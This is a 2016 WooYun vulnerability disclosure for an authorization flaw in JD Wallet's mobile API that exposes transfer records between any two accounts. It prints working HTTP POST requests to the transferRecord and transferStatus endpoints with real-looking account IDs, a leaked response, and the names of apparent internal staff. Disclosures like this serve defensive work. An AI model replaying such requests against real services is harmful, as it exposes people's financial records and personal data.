当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168304

漏洞标题:京东钱包越权查询之任意查看两账户之间的转账信息

相关厂商:京东金融

漏洞作者: 骑虎打狗

提交时间:2016-01-08 10:48

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-08: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

京东钱包越权查询之任意查看两账户之间的转账信息,强调下是任意两个账户!!

详细说明:

1.当客户端查询两个账户的交易转账记录时,使用Fiddler抓取到的封包如下(插曲:HTTPS的SSL证书校验可简单绕过真的不重要吗?内部却直接忽略了。。所以来乌云了):

POST https://m.wangyin.com/ryze/transferRecord HTTP/1.1
Content-Type: application/json; charset=UTF-8
Content-Length: 309
Host: m.wangyin.com
Connection: Close
User-Agent: android
Accept-Encoding: gzip
{"desCustomerId":"360000000041109552","pageNum":1,"pageSize":10,"channel":"xiaomi","clientVersion":"4.1.0","customerId":"360000000215219468","macAddress":"14-f6-5a-d1-47-0f","auth":"f9957871d0a24d108e62015942f4d5b5","userId":"1200006529071","clientName":"android","deviceId":"866001023475214","version":"2.0"}


发现了什么?是的,没有任何的Cookie、Key、Salt之类的东西,然后我把封包精简如下,仍然正常请求到结果:

POST https://m.wangyin.com/ryze/transferRecord HTTP/1.1
Content-Type: application/json; charset=UTF-8
Content-Length: 309
Host: m.wangyin.com
Connection: Close
User-Agent: android
Accept-Encoding: gzip
{"desCustomerId":"360000000041109552","pageNum":1,"pageSize":10,"channel":"","clientVersion":"","customerId":"360000000215219468","macAddress":"","auth":"","userId":"1200006529071","clientName":"","deviceId":"","version":""}


所以只需要三个信息就可查询两个账户之间的转账记录,具体如下图:

15.png


那么,问题来了,只知道一个手机账号,怎么获取任意账户的两个ID呢?(不知什么策略,一个账户有userID和userID2..)我扶了扶眼睛,想到了一个细节,那就是在转账的时候不是会验证账户吗,看他会不会返回验证账户的两个ID,测试果然。精简后的请求封包为:

POST https://m.wangyin.com/ryze/transferStatus HTTP/1.1
Content-Type: application/json; charset=UTF-8
Content-Length: 301
Host: m.wangyin.com
Connection: Close
User-Agent: android
Accept-Encoding: gzip
{"desCustomerName":"u7RNVmqGzNrHVgn/vI/UpQ\u003d\u003d","channel":"","clientVersion":"","customerId":"360000000253312977","macAddress":"","auth":"f15d43c3986293cfc3885121ad2204e3","userId":"1200010338038","clientName":"","deviceId":"","version":""}


他把手机号加密了,不过没关系,请求到就好,成功返回了验证账户的两个ID:

{"resultCode":0,"resultMsg":null,"resultData":{"validUser":true,"realNameUser":true,"desUserName":"*笑","accountName":"186****5417","historyTransfer":false,"desHeadIconUrl":"http://img20.360buyimg.com/payment/jfs/t1237/176/1060321396/24129/3671b827/557062baN2458bbda.png","inUserId":"1200006529071","inCustomerId":"360000000215219468"}}


这样就好了,我们可以成功获取任何账户的两个ID,那么任意两个账户之间的转账信息也就能获取了。

漏洞证明:

下面我就从我前几天搞到的内部账号来测试下两两转账的信息:

16.png


刑同举的两个ID:

17.png


岳棱辉的两个ID:

18.png


我们以刑同举为主角查看他与岳棱辉的转账信息。构造POST请求:

POST https://m.wangyin.com/ryze/transferRecord HTTP/1.1
Content-Type: application/json; charset=UTF-8
Content-Length: 224
Host: m.wangyin.com
Connection: Close
User-Agent: android
Accept-Encoding: gzip
{"desCustomerId":"360000000064845496","pageNum":1,"pageSize":10,"channel":"","clientVersion":"","customerId":"360000000051318036","macAddress":"","auth":"","userId":"1000000003607","clientName":"","deviceId":"","version":""}


请求结果:

19.png


不用多说了吧!

修复方案:

“是的,没有任何的Cookie、Key、Salt之类的东西,”

版权声明:转载请注明来源 骑虎打狗@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-01-08 18:35

厂商回复:

感谢关注京东金融安全!

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-08 11:33 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:765 漏洞数:83 | 铁甲依然在)

    嘿嘿~ 继续,继续~

  2. 2016-01-08 11:39 | 海琪花 ( 路人 | Rank:0 漏洞数:1 | 卖海产 。。。 不买勿扰)

    jd

  3. 2016-01-08 12:57 | 牛 小 帅 ( 普通白帽子 | Rank:1031 漏洞数:247 | 1.乌云最帅的男人 ...)

    你名字起的不好,应该要骑狗大虎,这样更有魄力